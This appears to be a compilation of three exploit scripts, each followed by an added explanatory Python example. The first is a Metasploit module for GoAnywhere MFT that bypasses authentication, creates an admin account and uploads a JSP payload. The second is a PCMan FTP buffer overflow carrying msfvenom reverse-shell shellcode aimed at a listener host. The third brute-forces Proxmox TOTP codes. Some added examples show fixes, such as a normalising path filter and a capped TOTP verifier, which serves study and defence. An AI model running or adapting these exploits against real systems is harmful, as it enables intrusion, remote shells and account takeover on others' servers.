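The Metasploit module that follows (Fortra GoAnywhere MFT, CVE-2024-0204) reaches the blocked /wizard/InitialAccountSetup.xhtml page through a URI such as /styles/..;/wizard/InitialAccountSetup.xhtml. The following Python is an added example placed ahead of the module, not code from the module or from Fortra: it models why that path slips past a string check on the request URI yet still routes to the protected page. Servlet containers treat `;...` on a path segment as a path parameter and drop it before resolving dot segments, so `..;` collapses to `..`; a filter that compares the raw path never sees the protected prefix. The filter here is a constructed stand-in for the kind of check the module's comments describe, and the normaliser is a deliberately small approximation of Tomcat's.

```python
"""Why "/styles/..;/wizard/InitialAccountSetup.xhtml" bypasses a raw-path filter.

Added example for the CVE-2024-0204 module below; the naive filter and the
mini-normaliser are constructed, not GoAnywhere's or Tomcat's actual code.
Paths are servlet-relative (the /goanywhere/ context prefix is omitted).
"""
import posixpath

PROTECTED = "/wizard/InitialAccountSetup.xhtml"   # the page the module abuses to add an admin


def strip_path_params(path: str) -> str:
    """Drop ';param' from every segment, as servlet containers do before routing.
    This is the step that turns '..;' into a plain '..' segment."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def container_normalize(path: str) -> str:
    """Approximate the path the container actually maps to a page:
    strip path parameters, then resolve '.' and '..' segments."""
    norm = posixpath.normpath(strip_path_params(path))
    if path.endswith("/") and not norm.endswith("/"):
        norm += "/"
    return norm


def filter_naive(path: str) -> bool:
    """Flawed check: allows the request unless the *raw* URI starts with the protected prefix."""
    return not path.startswith(PROTECTED)


def filter_hardened(path: str) -> bool:
    """Fix: normalise exactly as the router will, then compare the result."""
    return not container_normalize(path).startswith(PROTECTED)


def evaluate(path: str) -> dict:
    """Where the container routes the path, and whether each filter lets it through."""
    return {
        "routes_to": container_normalize(path),
        "naive_allows": filter_naive(path),
        "hardened_allows": filter_hardened(path),
    }


if __name__ == "__main__":
    # Constructed sample paths: the module's bypass via two of its candidate directories,
    # the direct (blocked) request, a normal asset, and a legitimate jsessionid path parameter.
    for p in ("/styles/..;/wizard/InitialAccountSetup.xhtml",
              "/help/..;/wizard/InitialAccountSetup.xhtml",
              PROTECTED,
              "/styles/main.css",
              "/auth/login.xhtml;jsessionid=ABC123"):
        print(f"{p:48} -> {evaluate(p)}")
```

The hardened filter still accepts the `;jsessionid=` form of an ordinary page, which is why normalising before comparing is preferable to rejecting every semicolon: it closes the bypass without breaking URL-rewritten sessions.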
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::FileDropper<br /> include Msf::Auxiliary::Report<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Fortra GoAnywhere MFT Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to<br /> create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere<br /> MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # MSF RCE Exploit<br /> 'James Horseman', # Original auth bypass PoC/Analysis<br /> 'Zach Hanley' # Original auth bypass PoC/Analysis<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-0204'],<br /> ['URL', 'https://www.fortra.com/security/advisory/fi-2024-001'], # Vendor Advisory<br /> ['URL', 'https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/']<br /> ],<br /> 'DisclosureDate' => '2024-01-22',<br /> 'Platform' => %w[linux win],<br /> 'Arch' => [ARCH_JAVA],<br /> 'Privileged' => true, # Could be 'NT AUTHORITY\SYSTEM' on Windows, or a non-root user 'gamft' on Linux.<br /> 'Targets' => [<br /> [<br /> # Tested on GoAnywhere 7.4.0 with the payload java/jsp_shell_reverse_tcp<br /> 'Automatic', {}<br /> ],<br /> [<br /> 'Linux',<br /> {<br /> 'Platform' => 'linux',<br /> 'GOANYWHERE_INSTALL_PATH' => '/opt/HelpSystems/GoAnywhere'<br /> }<br /> ],<br /> [<br /> 'Windows',<br /> {<br /> 'Platform' => 'win',<br /> 'GOANYWHERE_INSTALL_PATH' => 'C:\\Program 
Files\\Fortra\\GoAnywhere\\'<br /> },<br /> ],<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8001,<br /> 'SSL' => true<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS,<br /> # A new admin account is created, which the exploit can't destroy.<br /> CONFIG_CHANGES,<br /> # The upload may leave payload artifacts if the FileDropper mixins cleanup handlers cannot delete them.<br /> ARTIFACTS_ON_DISK<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The base path to the web application', '/goanywhere/']),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # We can query an undocumented unauthenticated REST API endpoint and pull the version number.<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/rest/gacmd/v1/system')<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200<br /><br /> json_data = res.get_json_document<br /><br /> product = json_data.dig('data', 'product')<br /><br /> version = json_data.dig('data', 'version')<br /><br /> return CheckCode::Unknown('No version information in response') if product.nil? 
|| version.nil?<br /><br /> # As per the Fortra advisory, the following versions are affected:<br /> # * Fortra GoAnywhere MFT 6.x from 6.0.1<br /> # * Fortra GoAnywhere MFT 7.x before 7.4.1<br /> # This implies versions 6.0.1 through 7.4.0 (inclusive) are vulnerable.<br /> if Rex::Version.new(version).between?(Rex::Version.new('6.0.1'), Rex::Version.new('7.4.0'))<br /> return CheckCode::Appears("#{product} #{version}")<br /> end<br /><br /> Exploit::CheckCode::Safe("#{product} #{version}")<br /> end<br /><br /> def exploit<br /> # CVE-2024-0204 allows an unauthenticated attacker to create a new administrator account on the target system. So<br /> # we generate the username/password pair we want to use.<br /> # Note: We cannot delete the administrator account that we create.<br /> admin_username = Rex::Text.rand_text_alpha_lower(8)<br /> admin_password = Rex::Text.rand_text_alphanumeric(16)<br /><br /> # By using a double dot path segment with a semicolon in it, we can bypass the server's attempts to block access to<br /> # the /wizard/InitialAccountSetup.xhtml endpoint that allows new admin account creation.
As we leverage a double<br /> # dot path segment, we need a directory to navigate down from; there are many available on the target, so we pick<br /> # a random one that we know works.<br /> path_segments = %w[styles fonts auth help]<br /><br /> path_segment = path_segments.sample<br /><br /> # This is CVE-2024-0204...<br /> initialaccountsetup_endpoint = "/#{path_segment}/..;/wizard/InitialAccountSetup.xhtml"<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, initialaccountsetup_endpoint),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'javax.faces.ViewState' => get_viewstate(initialaccountsetup_endpoint),<br /> 'j_id_u:creteAdminGrid:username' => admin_username,<br /> 'j_id_u:creteAdminGrid:password' => admin_password,<br /> 'j_id_u:creteAdminGrid:password_hinput' => admin_password,<br /> 'j_id_u:creteAdminGrid:confirmPassword' => admin_password,<br /> 'j_id_u:creteAdminGrid:confirmPassword_hinput' => admin_password,<br /> 'j_id_u:creteAdminGrid:submitButton' => '',<br /> 'createAdminForm_SUBMIT' => 1<br /> }<br /> )<br /><br /> # The method com.linoma.ga.ui.admin.users.InitialAccountSetupForm.InitialAccountSetupForm.submit will call method<br /> # loginNewAdminUser and update our current session, so we don't need to log in manually.<br /> unless res&.code == 302 && res.headers['Location'] == normalize_uri(target_uri.path, 'Dashboard.xhtml')<br /> fail_with(Failure::UnexpectedReply, "Unexpected reply 1 from #{initialaccountsetup_endpoint}")<br /> end<br /><br /> print_status("Created account: #{admin_username}:#{admin_password}. 
Note: This account will not be deleted by the module.")<br /><br /> store_credentials(admin_username, admin_password)<br /><br /> # Automatic targeting will detect the OS and product installation directory, by querying the About.xhtml page.<br /> if target.name == 'Automatic'<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/help/About.xhtml'),<br /> 'keep_cookies' => true<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply 2 from About.xhtml')<br /> end<br /><br /> # The OS name could be something like "Linux" or "Windows Server 2022". Under the hood, GoAnywhere is using<br /> # the Java system property "os.name".<br /> os_match = res.body.match(%r{<span id="AboutForm:\S+:OSName">(.+)</span>})<br /> unless os_match<br /> fail_with(Failure::UnexpectedReply, 'Did not locate OSName in About.xhtml')<br /> end<br /><br /> # To perform the JSP payload upload, we need to know the product installation path.<br /> install_match = res.body.match(%r{<span id="AboutForm:\S+:goAnywhereHome">(.+)</span>})<br /> unless install_match<br /> fail_with(Failure::UnexpectedReply, 'Did not locate goAnywhereHome in About.xhtml')<br /> end<br /><br /> # Find the Metasploit target (Linux/Windows) via a substring of the OS name we get back from GoAnywhere.<br /> found_target = targets.find do |t|<br /> os_match[1].downcase.include? 
t.name.downcase<br /> end<br /><br /> unless found_target<br /> fail_with(Failure::NoTarget, "Unable to select an automatic target for '#{os_match[1]}'")<br /> end<br /><br /> # Dup the target we found, as we patch in the GOANYWHERE_INSTALL_PATH below.<br /> detected_target = found_target.dup<br /><br /> detected_target.opts['GOANYWHERE_INSTALL_PATH'] = install_match[1]<br /><br /> print_status("Automatic targeting, detected OS: #{detected_target.name}")<br /> print_status("Automatic targeting, detected install path: #{detected_target['GOANYWHERE_INSTALL_PATH']}")<br /> else<br /> detected_target = target<br /> end<br /><br /> # We are going to upload a JSP payload via the FileManager interface. We first have to get the FileManager, then<br /> # change to the directory we want to upload to, then upload the file.<br /><br /> path_separator = detected_target['Platform'] == 'win' ? '\\' : '/'<br /><br /> # We drop the JSP payload to a location such as: /opt/HelpSystems/GoAnywhere/adminroot/PAYLOAD_NAME.jsp<br /> adminroot_path = detected_target['GOANYWHERE_INSTALL_PATH']<br /> adminroot_path += path_separator unless adminroot_path.end_with? 
path_separator<br /> adminroot_path += 'adminroot'<br /> adminroot_path += path_separator<br /><br /> viewstate = get_viewstate('/tools/filemanager/FileManager.xhtml')<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'javax.faces.ViewState' => viewstate,<br /> 'j_id_4u:j_id_4v:newPath_focus' => '',<br /> 'j_id_4u:j_id_4v:newPath_input' => '/',<br /> 'j_id_4u:j_id_4v:newPath_editableInput' => adminroot_path,<br /> 'j_id_4u:j_id_4v:NewPathButton' => '',<br /> 'j_id_4u_SUBMIT' => 1<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply 4 from FileManager.xhtml')<br /> end<br /><br /> # We need the reqId value from the page to upload a file, so we pull it out here.<br /> vs_input = res.get_html_document.at('input[name="reqId"]')<br /><br /> unless vs_input&.key? 'value'<br /> fail_with(Failure::UnexpectedReply, 'Did not locate reqId in reply 4 from FileManager.xhtml')<br /> end<br /><br /> request_id = vs_input['value']<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'javax.faces.ViewState' => viewstate,<br /> 'javax.faces.partial.ajax' => 'true',<br /> 'javax.faces.source' => 'uploadID',<br /> 'javax.faces.partial.execute' => 'uploadID',<br /> 'javax.faces.partial.render' => '@none',<br /> 'uploadID' => 'uploadID',<br /> 'uploadID_sessionCheck' => 'true',<br /> 'reqId' => request_id,<br /> 'whenFileExists_focus' => '',<br /> 'whenFileExists_input' => 'rename',<br /> 'uploaderType' => 'filemanager',<br /> 'j_id_4i_SUBMIT' => 1<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply 5 from FileManager.xhtml')<br /> end<br /><br /> jsp_filename 
= Rex::Text.rand_text_alphanumeric(8) + '.jsp'<br /><br /> message = Rex::MIME::Message.new<br /><br /> message.add_part(request_id, nil, nil, 'form-data; name="reqId"')<br /> message.add_part('', nil, nil, 'form-data; name="whenFileExists_focus"')<br /> message.add_part('rename', nil, nil, 'form-data; name="whenFileExists_input"')<br /> message.add_part('filemanager', nil, nil, 'form-data; name="uploaderType"')<br /> message.add_part('1', nil, nil, 'form-data; name="j_id_4i_SUBMIT"')<br /> message.add_part(viewstate, nil, nil, 'form-data; name="javax.faces.ViewState"')<br /> message.add_part('true', nil, nil, 'form-data; name="javax.faces.partial.ajax"')<br /> message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.partial.execute"')<br /> message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.source"')<br /> message.add_part('1', nil, nil, 'form-data; name="uniqueFileUploadId"')<br /> message.add_part(payload.encoded, 'text/plain', nil, "form-data; name=\"uploadID\"; filename=\"#{jsp_filename}\"")<br /><br /> # We can now upload our payload...<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),<br /> 'keep_cookies' => true,<br /> 'ctype' => 'multipart/form-data; boundary=' + message.bound,<br /> 'data' => message.to_s<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply 6 from FileManager.xhtml')<br /> end<br /><br /> # Register our payload so it is deleted when the session is created.<br /><br /> jsp_filepath = adminroot_path + jsp_filename<br /><br /> print_status("Dropped payload: #{jsp_filepath}")<br /><br /> # We are using the FileDropper mixin to automatically delete this file after a session has been created.<br /> register_file_for_cleanup(jsp_filepath)<br /><br /> # A copy of the files this user uploads is left here:<br /> # 
/opt/HelpSystems/GoAnywhere/userdata/documents/ADMIN_USERNAME/PAYLOAD_NAME.jsp<br /> # We register these to be deleted, but they appear to be locked, preventing deleting.<br /> userdoc_path = detected_target['GOANYWHERE_INSTALL_PATH']<br /> userdoc_path += path_separator unless userdoc_path.end_with? path_separator<br /> userdoc_path += 'userdata'<br /> userdoc_path += path_separator<br /> userdoc_path += 'documents'<br /> userdoc_path += path_separator<br /> userdoc_path += admin_username<br /> userdoc_path += path_separator<br /><br /> register_file_for_cleanup(userdoc_path + jsp_filename)<br /><br /> register_dir_for_cleanup(userdoc_path)<br /><br /> # Finally, trigger our payload via a GET request...<br /> send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, jsp_filename)<br /> )<br /><br /> # NOTE: it is not possible to delete the user account we created as we cant delete ourself either via the web<br /> # interface or REST API.<br /> end<br /><br /> # Helper method to pull out a viewstate identifier from a requests HTML response.<br /> def get_viewstate(endpoint)<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, endpoint),<br /> 'keep_cookies' => true<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, "Unexpected reply during get_viewstate via '#{endpoint}'.")<br /> end<br /><br /> vs_input = res.get_html_document.at('input[name="javax.faces.ViewState"]')<br /><br /> unless vs_input&.key? 
'value'<br /> fail_with(Failure::UnexpectedReply, "Did not locate ViewState during get_viewstate via '#{endpoint}'.")<br /> end<br /><br /> vs_input['value']<br /> end<br /><br /> def store_credentials(username, password)<br /> service_data = {<br /> address: datastore['RHOST'],<br /> port: datastore['RPORT'],<br /> service_name: 'GoAnywhere MFT Admin Interface',<br /> protocol: 'tcp',<br /> workspace_id: myworkspace_id<br /> }<br /><br /> credential_data = {<br /> origin_type: :service,<br /> module_fullname: fullname,<br /> username: username,<br /> private_data: password,<br /> private_type: :password<br /> }.merge(service_data)<br /><br /> credential_core = create_credential(credential_data)<br /><br /> login_data = {<br /> core: credential_core,<br /> last_attempted_at: DateTime.now,<br /> status: Metasploit::Model::Login::Status::SUCCESSFUL<br /> }.merge(service_data)<br /><br /> create_credential_login(login_data)<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow<br /># Date: 09/25/2023<br /># Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)<br /># Vendor Homepage: http://pcman.openfoundry.org/<br /># Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z<br /># Version: 2.0<br /># Tested on: Windows XP SP3<br /><br />#!/usr/bin/env python3<br /><br />import socket<br />import sys<br /><br /># Crash analysis behind the values used below:<br />#   buffer = 'A' * 2500             crashes the server<br />#   offset = 2007                   bytes of padding before EIP is overwritten<br />#   badchars = \x00\x0a\x0d         must not appear in the payload<br />#   return_address = 0x7e429353     JMP ESP in USER32.dll (Windows XP SP3)<br />#   msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"<br />#   nc -nvlp 4444                   listener for the reverse shell<br /><br /># Encoded reverse shell produced by the msfvenom command above.<br />overflow = (<br />    b"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9"<br />    b"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d"<br />    b"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f"<br />    b"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53"<br />    b"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55"<br />    b"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1"<br />    b"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52"<br />    b"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6"<br />    b"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37"<br />    b"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf"<br />    b"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3"<br />    b"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4"<br />    b"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75"<br />    b"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7"<br />    b"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e"<br />    b"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17"<br />    b"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98"<br />    b"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a"<br />    b"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15"<br />    b"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28"<br />    b"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb"<br />    b"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8"<br />    b"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8"<br />    b"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd"<br />    b"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94"<br />    b"\xd7"<br />)<br /><br /># padding | 0x7e429353 as little-endian bytes | NOP sled | shellcode<br />shellcode = b"A" * 2007 + b"\x53\x93\x42\x7e" + b"\x90" * 32 + overflow<br /><br /># Change IP/Port as required<br />target_ip = "192.168.146.135"<br />target_port = 21<br /><br />s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /><br />try:<br />    print("\nSending evil buffer...")<br />    s.connect((target_ip, target_port))<br />    s.recv(1024)                              # 220 banner<br />    s.send(b"USER anonymous\r\n")<br />    s.recv(1024)                              # 331 reply<br />    s.send(b"PASS anonymous\r\n")<br />    s.send(b"pwd " + shellcode + b"\r\n")     # overflows the pwd argument handler<br />    s.close()<br />    print("\nExploit completed successfully!")<br />except socket.error as e:<br />    print("Could not connect to FTP: %s" % e)<br />    sys.exit(1)<br /><br /></code></pre>
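The comments at the top of the script above compress the whole workflow: crash the service with 2500 bytes, find that EIP is overwritten after 2007 bytes, exclude \x00\x0a\x0d, and return through a JMP ESP in USER32.dll at 0x7e429353. The Python below is an added example and not part of the original exploit. It generates the cyclic pattern used to find such an offset, recovers the offset from the dword a debugger shows in EIP, and assembles the padding / return address / NOP sled / shellcode buffer while refusing any bad character. The 4-byte int3 stand-in for the msfvenom payload and the send_exploit helper are constructed for this example; the target host and port are whatever the caller passes in.

```python
import socket
import string
import struct

# Bad characters the original write-up lists for the PCMan 'pwd' handler.
BADCHARS = b"\x00\x0a\x0d"


def cyclic_pattern(length):
    """Metasploit-style cyclic pattern ('Aa0Aa1Aa2...'): every 4-byte window is unique."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern is limited to 20280 bytes")


def pattern_offset(pattern, eip):
    """Offset in the pattern of the dword that landed in EIP (x86 stores it little-endian)."""
    return pattern.find(struct.pack("<I", eip))  # -1 if the crash was not caused by this pattern


def build_exploit_buffer(offset, ret_addr, nop_count, shellcode, badchars=BADCHARS):
    """padding | return address (little-endian) | NOP sled | shellcode, refusing any bad char."""
    buf = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_count + shellcode
    hit = sorted({b for b in buf if b in badchars})
    if hit:
        raise ValueError("bad char(s) present: " + ", ".join("0x%02x" % b for b in hit))
    return buf


def ftp_commands(buf, user=b"anonymous", password=b"anonymous"):
    """Command sequence the PoC sends: log in, then the oversized pwd argument."""
    return [b"USER " + user + b"\r\n", b"PASS " + password + b"\r\n", b"pwd " + buf + b"\r\n"]


def send_exploit(host, port, buf, timeout=5):
    """Deliver the buffer over TCP (needs a live target; not exercised offline)."""
    user_cmd, pass_cmd, pwd_cmd = ftp_commands(buf)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)          # 220 banner
        s.sendall(user_cmd)
        s.recv(1024)          # 331 reply
        s.sendall(pass_cmd)
        s.sendall(pwd_cmd)    # the server crashes here, so no reply is read


if __name__ == "__main__":
    # Step 1 of the write-up: a 2500-byte cyclic pattern instead of 'A' * 2500 locates EIP.
    pattern = cyclic_pattern(2500)
    eip_seen = struct.unpack("<I", pattern[2007:2011])[0]   # what the debugger would show
    print("EIP 0x%08x -> offset %d" % (eip_seen, pattern_offset(pattern, eip_seen)))
    # Steps 2-4: JMP ESP in USER32.dll at 0x7e429353, 32 NOPs, then the (placeholder) shellcode.
    PLACEHOLDER_SHELLCODE = b"\xcc" * 4   # constructed stand-in for the msfvenom payload
    buf = build_exploit_buffer(2007, 0x7e429353, 32, PLACEHOLDER_SHELLCODE)
    print("buffer length %d, EIP bytes %s" % (len(buf), buf[2007:2011].hex()))
```

The bad-character check is what catches a return address or encoder output that would be mangled by the FTP parser: a JMP ESP whose address contains 0x0a, for instance, is rejected before anything is sent.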
<pre><code># Exploit Title: Proxmox VE TOTP Brute Force<br /># Date: 09/23/2023<br /># Exploit Author: Cory Cline, Gabe Rust<br /># Vendor Homepage: https://www.proxmox.com/en/<br /># Software Link: http://download.proxmox.com/iso/<br /># Version: 5.4 - 7.4-1<br /># Tested on: Debian<br /># CVE : CVE-2023-43320<br /><br />import concurrent.futures<br />import json<br />import os<br />import time<br />import urllib.parse<br /><br />import requests<br />import urllib3<br /><br />urllib3.disable_warnings()<br />threads = 25<br /><br />#################### REPLACE THESE VALUES #########################<br />password = "KNOWN PASSWORD HERE"<br />username = "KNOWN USERNAME HERE"<br />target_url = "https://HOST:PORT"<br />##################################################################<br /><br />ticket_username = ""<br />CSRFPreventionToken = ""<br />ticket_data = {}<br /><br />auto_refresh_time = 20  # in minutes - 30 minutes before expiration<br />last_refresh_time = 0<br /><br /># Every possible 6-digit TOTP code, 000000 .. 999999.<br />tokens = [str(num).zfill(6) for num in range(0, 1000000)]<br /><br /><br />def refresh_ticket(target_url, username, password):<br />    """First login stage: username + password yield a TFA challenge ticket and a CSRF token."""<br />    global CSRFPreventionToken<br />    global ticket_username<br />    global ticket_data<br />    refresh_ticket_url = target_url + "/api2/extjs/access/ticket"<br />    refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}<br />    ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, data=refresh_ticket_data, verify=False).text)<br />    ticket_data = json.loads(ticket_data_raw)<br />    CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]<br />    ticket_username = ticket_data["data"]["username"]<br /><br /><br />def attack(token):<br />    """Second login stage: replay the same challenge ticket with one TOTP guess."""<br />    global last_refresh_time<br />    if int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)):<br />        refresh_ticket(target_url, username, password)<br />        last_refresh_time = int(time.time())<br /><br />    url = target_url + "/api2/extjs/access/ticket"<br />    headers = {"Csrfpreventiontoken": CSRFPreventionToken}<br />    stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]<br />    stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')<br />    data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}<br />    response = requests.post(url, headers=headers, data=data, verify=False)<br />    # A correct code returns a full login ticket, which is much longer than the error reply.<br />    if len(response.text) > 350:<br />        print(response.text)<br />        os._exit(1)<br /><br /><br />while True:<br />    refresh_ticket(target_url, username, password)<br />    last_refresh_time = int(time.time())<br /><br />    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:<br />        res = [executor.submit(attack, token) for token in tokens]<br />        concurrent.futures.wait(res)<br /><br /></code></pre>
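The script above works only because the second login stage accepts an unlimited number of TOTP guesses against the same tfa-challenge ticket, so the 10^6 six-digit codes are a small search space, and a verifier that tolerates one step of clock skew makes three of them valid at any moment. The block below is an added example, not Proxmox code: an RFC 4226/6238 HOTP and TOTP implementation checked against the RFC test vectors, a verifier that accepts a skew window, refuses replayed codes and locks the login after a configurable number of failures (5 here, an assumed value; the per-user counters are kept in memory for the example), and a brute_force routine that drives it the way the PoC drives the API, so the unbounded and the capped behaviour can be compared side by side.

```python
import hashlib
import hmac
import struct
import time


def hotp(secret, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%0*d" % (digits, code % (10 ** digits))


def totp(secret, now, step=30, digits=6):
    """RFC 6238 TOTP: HOTP over the number of 30-second steps since the Unix epoch."""
    return hotp(secret, int(now) // step, digits)


class TotpVerifier:
    """Second-factor check with a clock-skew window, replay protection and a failed-attempt cap.

    max_attempts=None reproduces the unbounded behaviour the PoC above relies on.
    """

    def __init__(self, secret, window=1, max_attempts=5, step=30, digits=6):
        self.secret = secret
        self.window = window
        self.max_attempts = max_attempts  # assumed policy value; None disables the cap
        self.step = step
        self.digits = digits
        self.failures = {}       # username -> consecutive failed attempts (in-memory for the example)
        self.last_counter = {}   # username -> counter of the last accepted code (blocks replay)
        self._cache = (None, {})

    def _candidates(self, counter):
        # code -> counter for every step inside the window, computed once per step
        if self._cache[0] != counter:
            rng = range(counter - self.window, counter + self.window + 1)
            self._cache = (counter, {hotp(self.secret, c, self.digits): c for c in rng})
        return self._cache[1]

    def verify(self, username, code, now=None):
        now = time.time() if now is None else now
        if self.max_attempts is not None and self.failures.get(username, 0) >= self.max_attempts:
            return "locked"
        matched = self._candidates(int(now) // self.step).get(code)
        if matched is None:
            self.failures[username] = self.failures.get(username, 0) + 1
            return "bad"
        if matched <= self.last_counter.get(username, -1):
            return "replay"          # a code is good for one login only
        self.last_counter[username] = matched
        self.failures.pop(username, None)
        return "ok"


def brute_force(verifier, username, now):
    """Walk 000000..999999 against one login, as the PoC does, until the verifier stops saying 'bad'."""
    for n in range(10 ** 6):
        status = verifier.verify(username, "%06d" % n, now)
        if status != "bad":
            return status, n + 1
    return "exhausted", 10 ** 6


if __name__ == "__main__":
    SECRET = b"12345678901234567890"   # the RFC 6238 test-vector secret
    print("TOTP at t=59:", totp(SECRET, 59))
    print("uncapped:", brute_force(TotpVerifier(SECRET, max_attempts=None), "root", 59))
    print("capped:  ", brute_force(TotpVerifier(SECRET, max_attempts=5), "root", 59))
```

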